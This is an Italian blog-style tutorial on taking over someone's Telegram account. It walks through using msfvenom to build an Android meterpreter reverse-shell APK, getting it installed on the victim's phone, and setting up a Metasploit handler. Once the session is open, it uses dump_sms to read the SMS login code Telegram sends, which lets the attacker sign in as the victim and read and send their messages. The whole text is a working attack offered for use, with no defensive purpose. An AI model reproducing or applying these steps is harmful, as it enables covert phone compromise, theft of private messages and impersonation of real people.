Come hackerare Telegram


Telegram, insieme a Whatsapp, è una delle piattaforme di messaggistica più usate nel mondo. Sì, se ve lo state chiedendo si considerano anche gli hacker russi, terroristi e compagnia bella.

Tutti parlano di sicurezza, crittografia di qua, crittografia di là, ma la realtà... è un altra.

TAN TAN TAAAAAN!

A parte gli scherzi, il punto non è la crittografia, ma bensì il punto debole è un altro.

E ci puoi credere o meno, ma per hackerare il profilo Telegram di una persona, ci vogliono solo 20 minuti!

E quanto ci vuole per fare una cosa di 20 minuti? 20 minuti!

Allora, iniziamo!


REQUISITI:

 

  • Computer con un qualsiasi sistema operativo 
  • Ultima versione di Metasploit Framework che trovi qui:  METASPLOIT


  • 1) Creazione della backdoor

iniziamo a creare il nostro file apk infetto.infatti Metasploit mette a disposizione anche il modulo per la creazione di file apk. Apriamo il terminale e digitiamo:

  • msfvenom -p android/meterpreter/reverse_tcp LHOST=[ip_macchina_attaccante] LPORT=[porta_per_la_connessione] R > [nome_file].apk

Il payload è pronto, non ci resta che portarlo sul dispositivo mobile.

 

2)Impostare L'handler

Disattivato il controllo delle fonti sicure sul dispositivo, avviamo msfconsole con il comando msfconsole e impostiamo un handler generico per android

 

  • msfconsole
  • use exploit/multi/handler
  • set PAYLOAD android/meterpreter/reverse_tcp
  • set LHOST [ip_macchina_attaccante]
  • set LPORT [porta_per_la_connessione]

3)Lanciare l'exploit e collegarsi al dispositivo

 

lanciamo il nostro exploit digitando

 

  • exploit

e installiamo l'apk infetto sul dispositivo.

una volta fatto digitiamo

  • sessions -l
  • sessions -i [numero sessione]
4)Hackerare Telegram
Ora dal nostro cellulare, installiamo Telegram (disistallandolo se è già presente) e iscriviamoci alla piattaforma con il numero della vittima.
Quando Telegram attende la conferma del numero di telefono (mandando un codice per messaggio), digita dal terminale
  •  dump_sms
Ora selezioniamo il messaggio di conferma inviato da Telegram e trascriviamo il codice inviato sul nostro telefono.
5)Successo!
Ora avrai sul tuo telefono l'esatta copia dell'ultimo backup di Telegram della vittima. 
Potrai ricevere i messaggi, modificare le impostazioni di profilo e inviare messaggi.